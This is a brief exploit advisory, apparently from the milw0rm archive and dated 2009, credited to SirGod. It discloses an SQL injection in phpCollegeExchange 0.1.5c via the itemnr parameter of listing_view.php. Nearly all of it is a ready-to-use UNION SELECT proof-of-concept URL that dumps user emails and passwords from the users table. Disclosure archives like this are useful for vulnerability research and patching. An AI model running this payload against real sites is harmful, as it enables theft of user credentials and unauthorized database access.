################################################################################################################# [+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability [+] Discovered By SirGod [+] www.mortal-team.org ################################################################################################################# [+] Script homepage : http://phpcollegeex.sourceforge.net/ [+] SQL Injection http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users-- ################################################################################################################# # milw0rm.com [2009-06-15]